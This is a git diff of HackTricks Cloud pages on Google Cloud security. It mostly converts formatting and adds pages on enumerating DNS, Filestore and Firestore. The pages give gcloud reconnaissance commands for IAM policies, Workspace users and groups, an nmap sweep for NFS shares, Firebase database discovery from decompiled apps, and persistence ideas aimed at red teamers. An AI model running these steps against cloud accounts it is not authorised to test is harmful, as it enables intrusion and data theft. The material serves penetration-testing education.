-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md
similarity index 54%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md
index 87cc18241..a55faeb46 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md
@@ -1,19 +1,6 @@
 # GCP - VPC & Networking
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## **GCP Compute Networking in a Nutshell**
 
@@ -34,28 +21,27 @@ By default, every network has two [**implied firewall rules**](https://cloud.goo
 
 When a GCP project is created, a VPC called **`default`** is also created, with the following firewall rules:
 
-* **default-allow-internal:** allow all traffic from other instances on the `default` network
-* **default-allow-ssh:** allow 22 from everywhere
-* **default-allow-rdp:** allow 3389 from everywhere
-* **default-allow-icmp:** allow ping from everywhere
+- **default-allow-internal:** allow all traffic from other instances on the `default` network
+- **default-allow-ssh:** allow 22 from everywhere
+- **default-allow-rdp:** allow 3389 from everywhere
+- **default-allow-icmp:** allow ping from everywhere
 
-{% hint style="warning" %}
-As you can see, **firewall rules** tend to be **more permissive** for **internal IP addresses**. The default VPC permits all traffic between Compute Instances.
-{% endhint %}
+> [!WARNING]
+> As you can see, **firewall rules** tend to be **more permissive** for **internal IP addresses**. The default VPC permits all traffic between Compute Instances.
 
 More **Firewall rules** can be created for the default VPC or for new VPCs. [**Firewall rules**](https://cloud.google.com/vpc/docs/firewalls) can be applied to instances via the following **methods**:
 
-* [**Network tags**](https://cloud.google.com/vpc/docs/add-remove-network-tags)
-* [**Service accounts**](https://cloud.google.com/vpc/docs/firewalls#serviceaccounts)
-* **All instances within a VPC**
+- [**Network tags**](https://cloud.google.com/vpc/docs/add-remove-network-tags)
+- [**Service accounts**](https://cloud.google.com/vpc/docs/firewalls#serviceaccounts)
+- **All instances within a VPC**
 
 Unfortunately, there isn't a simple `gcloud` command to spit out all Compute Instances with open ports on the internet. You have to connect the dots between firewall rules, network tags, services accounts, and instances.
 
 This process was automated using [this python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_firewall_enum) which will export the following:
 
-* CSV file showing instance, public IP, allowed TCP, allowed UDP
-* nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0)
-* masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0)
+- CSV file showing instance, public IP, allowed TCP, allowed UDP
+- nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0)
+- masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0)
 
 ### Hierarchical Firewall Policies 
 
@@ -69,7 +55,7 @@ You can read here how to [**create a Hierarchical Firewall Policy**](https://clo
 
 ### Firewall Rules Evaluation
 
-

+

 
 1. Org: Firewall policies assigned to the Organization
 2. Folder: Firewall policies assigned to the Folder
@@ -84,29 +70,16 @@ Peered VPC networks can be in the same project, different projects of the same o
 
 These are the needed permissions:
 
-* `compute.networks.addPeering`
-* `compute.networks.updatePeering`
-* `compute.networks.removePeering`
-* `compute.networks.listPeeringRoutes`
+- `compute.networks.addPeering`
+- `compute.networks.updatePeering`
+- `compute.networks.removePeering`
+- `compute.networks.listPeeringRoutes`
 
 [**More in the docs**](https://cloud.google.com/vpc/docs/vpc-peering).
 
 ## References
 
-* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
-* [https://cloud.google.com/vpc/docs/firewall-policies-overview#rule-evaluation](https://cloud.google.com/vpc/docs/firewall-policies-overview#rule-evaluation)
+- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [https://cloud.google.com/vpc/docs/firewall-policies-overview#rule-evaluation](https://cloud.google.com/vpc/docs/firewall-policies-overview#rule-evaluation)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md
similarity index 58%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md
index 5724894e6..a06af7e15 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md
@@ -1,19 +1,6 @@
 # GCP - Containers & GKE Enum
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Containers
 
@@ -41,9 +28,9 @@ sudo docker pull HOSTNAME//
 
 In the following page you can check how to **abuse container permissions to escalate privileges**:
 
-{% content-ref url="../gcp-privilege-escalation/gcp-container-privesc.md" %}
-[gcp-container-privesc.md](../gcp-privilege-escalation/gcp-container-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-privilege-escalation/gcp-container-privesc.md
+{{#endref}}
 
 ## Node Pools
 
@@ -59,9 +46,9 @@ gcloud container node-pools describe --cluster  --zone  [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md
new file mode 100644
index 000000000..8742886bc
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md
@@ -0,0 +1,25 @@
+# GCP - DNS Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## GCP - Cloud DNS
+
+Google Cloud DNS is a high-performance, resilient, global Domain Name System (DNS) service.
+
+```bash
+# This will usually error if DNS service isn't configured in the project
+gcloud dns project-info describe 
+
+# Get DNS zones & records
+gcloud dns managed-zones list
+gcloud dns managed-zones describe 
+gcloud dns record-sets list --zone  # Get record of the zone
+
+# Policies
+## A response policy is a collection of selectors that apply to queries made against one or more virtual private cloud networks.
+gcloud dns response-policies list
+## DNS policies control internal DNS server settings. You can apply policies to DNS servers on Google Cloud Platform VPC networks you have access to.
+gcloud dns policies list
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md
new file mode 100644
index 000000000..aaa7bacc7
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md
@@ -0,0 +1,74 @@
+# GCP - Filestore Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Google Cloud Filestore is a **managed file storage service** tailored for applications in need of both a **filesystem interface and a shared filesystem for data**. This service excels by offering high-performance file shares, which can be integrated with various GCP services. Its utility shines in scenarios where traditional file system interfaces and semantics are crucial, such as in media processing, content management, and the backup of databases.
+
+You can think of this like any other **NFS** **shared document repository -** a potential source of sensitive info.
+
+### Connections
+
+When creating a Filestore instance it's possible to **select the network where it's going to be accessible**.
+
+Moreover, by **default all clients on the selected VPC network and region are going to be able to access it**, however, it's possible to **restrict the access also by IP address** or range and indicate the access privilege (Admin, Admin Viewer, Editor, Viewer) user the client is going to get **depending on the IP address.**
+
+It can also be accessible via a **Private Service Access Connection:**
+
+- Are per VPC network and can be used across all managed services such as Memorystore, Tensorflow and SQL.
+- Are **between your VPC network and network owned by Google using a VPC peering**, enabling your instances and services to communicate exclusively by **using internal IP addresses**.
+- Create an isolated project for you on the service-producer side, meaning no other customers share it. You will be billed for only the resources you provision.
+- The VPC peering will import new routes to your VPC
+
+### Backups
+
+It's possible to create **backups of the File shares**. These can be later **restored in the origin** new Fileshare instance or in **new ones**.
+
+### Encryption
+
+By default a **Google-managed encryption key** will be used to encrypt the data, but it's possible to select a **Customer-managed encryption key (CMEK)**.
+
+### Enumeration
+
+If you find a filestore available in the project, you can **mount it** from within your compromised Compute Instance. Use the following command to see if any exist.
+
+```bash
+# Instances
+gcloud filestore instances list # Check the IP address
+gcloud filestore instances describe --zone   # Check IP and access restrictions
+
+# Backups
+gcloud filestore backups list
+gcloud filestore backups describe --region  
+
+# Search for NFS shares in a VPC subnet
+sudo nmap -n -T5 -Pn -p 2049 --min-parallelism 100 --min-rate 1000 --open 10.99.160.2/20
+```
+
+> [!CAUTION]
+> Note that a filestore service might be in a **completely new subnetwork created for it** (inside a Private Service Access Connection, which is a **VPC peer**).\
+> So you might need to **enumerate VPC peers** to also run nmap over those network ranges.
+>
+> ```bash
+> # Get peerings
+> gcloud compute networks peerings list
+> # Get routes imported from a peering
+> gcloud compute networks peerings list-routes  --network= --region= --direction=INCOMING
+> ```
+
+### Privilege Escalation & Post Exploitation
+
+There aren't ways to escalate privileges in GCP directly abusing this service, but using some **Post Exploitation tricks it's possible to get access to the data** and maybe you can find some credentials to escalate privileges:
+
+{{#ref}}
+../gcp-post-exploitation/gcp-filestore-post-exploitation.md
+{{#endref}}
+
+### Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-filestore-persistence.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md
similarity index 59%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md
index e4302bc44..a2a9fafd4 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md
@@ -1,19 +1,6 @@
 # GCP - Firebase Enum
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/)
 
@@ -26,7 +13,7 @@ Some **Firebase endpoints** could be found in **mobile applications**. It is pos
 This is the common methodology to search and exploit poorly configured Firebase databases:
 
 1. **Get the APK** of app you can use any of the tool to get the APK from the device for this POC.\
-   You can use “APK Extractor” [https://play.google.com/store/apps/details?id=com.ext.ui\&hl=e](https://hackerone.com/redirect?signature=3774f35d1b5ea8a4fd209d80084daa9f5887b105\&url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.ext.ui%26hl%3Den)
+   You can use “APK Extractor” [https://play.google.com/store/apps/details?id=com.ext.ui\&hl=e](https://hackerone.com/redirect?signature=3774f35d1b5ea8a4fd209d80084daa9f5887b105&url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.ext.ui%26hl%3Den)
 2. **Decompile** the APK using **apktool**, follow the below command to extract the source code from the APK.
 3. Go to the _**res/values/strings.xml**_ and look for this and **search** for “**firebase**” keyword
 4. You may find something like this URL “_**https://xyz.firebaseio.com/**_”
@@ -73,8 +60,8 @@ To test other actions on the database, such as writing to the database, refer to
 
 If you decompile the iOS application and open the file `GoogleService-Info.plist` and you find the API Key and APP ID:
 
-* API KEY **AIzaSyAs1\[...]**
-* APP ID **1:612345678909:ios:c212345678909876**
+- API KEY **AIzaSyAs1\[...]**
+- APP ID **1:612345678909:ios:c212345678909876**
 
 You may be able to access some interesting information
 
@@ -84,20 +71,7 @@ You may be able to access some interesting information
 
 ## References 
 
-* ​[https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/](https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/)​
-* ​[https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1](https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1)​
+- ​[https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/](https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/)​
+- ​[https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1](https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1)​
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md
new file mode 100644
index 000000000..2e63d18cd
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md
@@ -0,0 +1,17 @@
+# GCP - Firestore Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
+
+Cloud Firestore, provided by Firebase and Google Cloud, is a **database that is both scalable and flexible, catering to mobile, web, and server development needs**. Its functionalities are akin to those of Firebase Realtime Database, ensuring data synchronization across client applications with realtime listeners. A significant feature of Cloud Firestore is its support for offline operations on mobile and web platforms, enhancing app responsiveness even in conditions of high network latency or absence of internet connection. Moreover, it is designed to integrate smoothly with other products from Firebase and Google Cloud, such as Cloud Functions.
+
+```bash
+gcloud firestore indexes composite list
+gcloud firestore indexes composite describe 
+gcloud firestore indexes fields list
+gcloud firestore indexes fields describe 
+gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios'
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md
similarity index 55%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md
index a66c58493..df894ea13 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md
@@ -1,27 +1,14 @@
 # GCP - IAM, Principals & Org Policies Enum
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Service Accounts
 
 For an intro about what is a service account check:
 
-{% content-ref url="../gcp-basic-information/" %}
-[gcp-basic-information](../gcp-basic-information/)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-basic-information/
+{{#endref}}
 
 ### Enumeration
 
@@ -35,24 +22,22 @@ gcloud iam service-accounts list --project 
 
 For an intro about how Users & Groups work in GCP check:
 
-{% content-ref url="../gcp-basic-information/" %}
-[gcp-basic-information](../gcp-basic-information/)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-basic-information/
+{{#endref}}
 
 ### Enumeration
 
 With the permissions **`serviceusage.services.enable`** and **`serviceusage.services.use`** it's possible to **enable services** in a project and use them.
 
-{% hint style="danger" %}
-Note that by default, Workspace users are granted the role **Project Creator**, giving them access to **create new projects**. When a user creates a project, he is granted the **`owner`** role over it. So, he could **enable these services over the project to be able to enumerate Workspace**.
-
-However, notice that it's also needed to have **enough permissions in Workspace** to be able to call these APIs.
-{% endhint %}
+> [!CAUTION]
+> Note that by default, Workspace users are granted the role **Project Creator**, giving them access to **create new projects**. When a user creates a project, he is granted the **`owner`** role over it. So, he could **enable these services over the project to be able to enumerate Workspace**.
+>
+> However, notice that it's also needed to have **enough permissions in Workspace** to be able to call these APIs.
 
 If you can **enable the `admin` service** and if your user has **enough privileges in workspace,** you could **enumerate all groups & users** with the following lines.\
 Even if it says **`identity groups`**, it also returns **users without any groups**:
 
-{% code overflow="wrap" %}
 ```bash
 # Enable admin
 gcloud services enable admin.googleapis.com
@@ -75,15 +60,13 @@ gcloud identity groups memberships search-transitive-memberships --group-email=<
 ## Get a graph (if you have enough permissions)
 gcloud identity groups memberships get-membership-graph --member-email= --labels=cloudidentity.googleapis.com/groups.discussion_forum
 ```
-{% endcode %}
 
-{% hint style="success" %}
-In the previous examples the param `--labels` is required, so a generic value is used (it's not requires if you used the API directly like [**PurplePanda does in here**](https://github.com/carlospolop/PurplePanda/blob/master/intel/google/discovery/disc_groups_users.py).
-{% endhint %}
+> [!TIP]
+> In the previous examples the param `--labels` is required, so a generic value is used (it's not requires if you used the API directly like [**PurplePanda does in here**](https://github.com/carlospolop/PurplePanda/blob/master/intel/google/discovery/disc_groups_users.py).
 
 Even with the admin service enable, it's possible that you get an error enumerating them because your compromised workspace user doesn't have enough permissions:
 
-

+

 
 ## IAM
 
@@ -95,14 +78,13 @@ From the [**docs**](https://cloud.google.com/resource-manager/docs/default-acces
 
 These **roles** grant the **permissions**:
 
-* `billing.accounts.create` and `resourcemanager.organizations.get`
-* `resourcemanager.organizations.get` and `resourcemanager.projects.create`
+- `billing.accounts.create` and `resourcemanager.organizations.get`
+- `resourcemanager.organizations.get` and `resourcemanager.projects.create`
 
 Moreover, when a user creates a project, he is **granted owner of that project automatically** according to the [docs](https://cloud.google.com/resource-manager/docs/access-control-proj). Therefore, by default, a user will be able to create a project and run any service on it (miners? Workspace enumeration? ...)
 
-{% hint style="danger" %}
-The highest privilege in a GCP Organization is the **Organization Administrator** role.
-{% endhint %}
+> [!CAUTION]
+> The highest privilege in a GCP Organization is the **Organization Administrator** role.
 
 ### set-iam-policy vs add-iam-policy-binding
 
@@ -136,7 +118,7 @@ gcloud iam list-grantable-roles 
 
 There are different ways to check all the permissions of a user in different resources (such as organizations, folders, projects...) using this service.
 
-* The permission **`cloudasset.assets.searchAllIamPolicies`** can request **all the iam policies** inside a resource.
+- The permission **`cloudasset.assets.searchAllIamPolicies`** can request **all the iam policies** inside a resource.
 
 ```bash
 gcloud asset search-all-iam-policies #By default uses current configured project
@@ -145,7 +127,7 @@ gcloud asset search-all-iam-policies --scope organizations/123456
 gcloud asset search-all-iam-policies --scope projects/project-id-123123
 ```
 
-* The permission **`cloudasset.assets.analyzeIamPolicy`** can request **all the iam policies** of a principal inside a resource.
+- The permission **`cloudasset.assets.analyzeIamPolicy`** can request **all the iam policies** of a principal inside a resource.
 
 ```bash
 # Needs perm "cloudasset.assets.analyzeIamPolicy" over the asset
@@ -157,7 +139,7 @@ gcloud asset analyze-iam-policy --project= \
             --identity='user:email@hacktricks.xyz'
 ```
 
-* The permission **`cloudasset.assets.searchAllResources`** allows listing all resources of an organization, folder, or project. IAM related resources (like roles) included.
+- The permission **`cloudasset.assets.searchAllResources`** allows listing all resources of an organization, folder, or project. IAM related resources (like roles) included.
 
 ```bash
 gcloud asset search-all-resources --scope projects/
@@ -165,14 +147,14 @@ gcloud asset search-all-resources --scope folders/1234567
 gcloud asset search-all-resources --scope organizations/123456
 ```
 
-* The permission **`cloudasset.assets.analyzeMove`** but be useful to also retrieve policies affecting a resource like a project
+- The permission **`cloudasset.assets.analyzeMove`** but be useful to also retrieve policies affecting a resource like a project
 
 ```bash
 gcloud asset analyze-move --project= \
           --destination-organization=609216679593
 ```
 
-* I suppose the permission **`cloudasset.assets.queryIamPolicy`** could also give access to find permissions of principals
+- I suppose the permission **`cloudasset.assets.queryIamPolicy`** could also give access to find permissions of principals
 
 ```bash
 # But, when running something like this
@@ -183,48 +165,47 @@ ERROR: (gcloud.asset.query) UNAUTHENTICATED: QueryAssets API is only supported f
 
 ### testIamPermissions enumeration
 
-{% hint style="danger" %}
-If you **cannot access IAM information** using the previous methods and you are in a Red Team. You could **use the tool**[ **https://github.com/carlospolop/bf\_my\_gcp\_perms**](https://github.com/carlospolop/bf_my_gcp_perms) **to brute-force your current permissions.**
-
-However, note that the service **`cloudresourcemanager.googleapis.com`** needs to be enabled.
-{% endhint %}
+> [!CAUTION]
+> If you **cannot access IAM information** using the previous methods and you are in a Red Team. You could **use the tool**[ **https://github.com/carlospolop/bf_my_gcp_perms**](https://github.com/carlospolop/bf_my_gcp_perms) **to brute-force your current permissions.**
+>
+> However, note that the service **`cloudresourcemanager.googleapis.com`** needs to be enabled.
 
 ### Privesc
 
 In the following page you can check how to **abuse IAM permissions to escalate privileges**:
 
-{% content-ref url="../gcp-privilege-escalation/gcp-iam-privesc.md" %}
-[gcp-iam-privesc.md](../gcp-privilege-escalation/gcp-iam-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-privilege-escalation/gcp-iam-privesc.md
+{{#endref}}
 
 ### Unauthenticated Enum 
 
-{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md" %}
-[gcp-iam-principals-and-org-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md
+{{#endref}}
 
 ### Post Exploitation 
 
-{% content-ref url="../gcp-post-exploitation/gcp-iam-post-exploitation.md" %}
-[gcp-iam-post-exploitation.md](../gcp-post-exploitation/gcp-iam-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-post-exploitation/gcp-iam-post-exploitation.md
+{{#endref}}
 
 ### Persistence
 
 If you have high privileges you could:
 
-* Create new SAs (or users if in Workspace)
-* Give principals controlled by yourself more permissions
-* Give more privileges to vulnerable SAs (SSRF in vm, vuln Cloud Function…)
-* …
+- Create new SAs (or users if in Workspace)
+- Give principals controlled by yourself more permissions
+- Give more privileges to vulnerable SAs (SSRF in vm, vuln Cloud Function…)
+- …
 
 ## Org Policies
 
 For an intro about what Org Policies are check:
 
-{% content-ref url="../gcp-basic-information/" %}
-[gcp-basic-information](../gcp-basic-information/)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-basic-information/
+{{#endref}}
 
 The IAM policies indicate the permissions principals has over resources via roles, which are assigned granular permissions. Organization policies **restrict how those services can be used or which features are disabled**. This helps in order to improve the least privilege of each resource in the GCP environment.
 
@@ -238,21 +219,8 @@ gcloud resource-manager org-policies list --project=PROJECT_ID
 
 In the following page you can check how to **abuse org policies permissions to escalate privileges**:
 
-{% content-ref url="../gcp-privilege-escalation/gcp-orgpolicy-privesc.md" %}
-[gcp-orgpolicy-privesc.md](../gcp-privilege-escalation/gcp-orgpolicy-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-privilege-escalation/gcp-orgpolicy-privesc.md
+{{#endref}}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md
similarity index 57%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md
index 2e2c0be96..25d143161 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md
@@ -1,19 +1,6 @@
 # GCP - KMS Enum
 
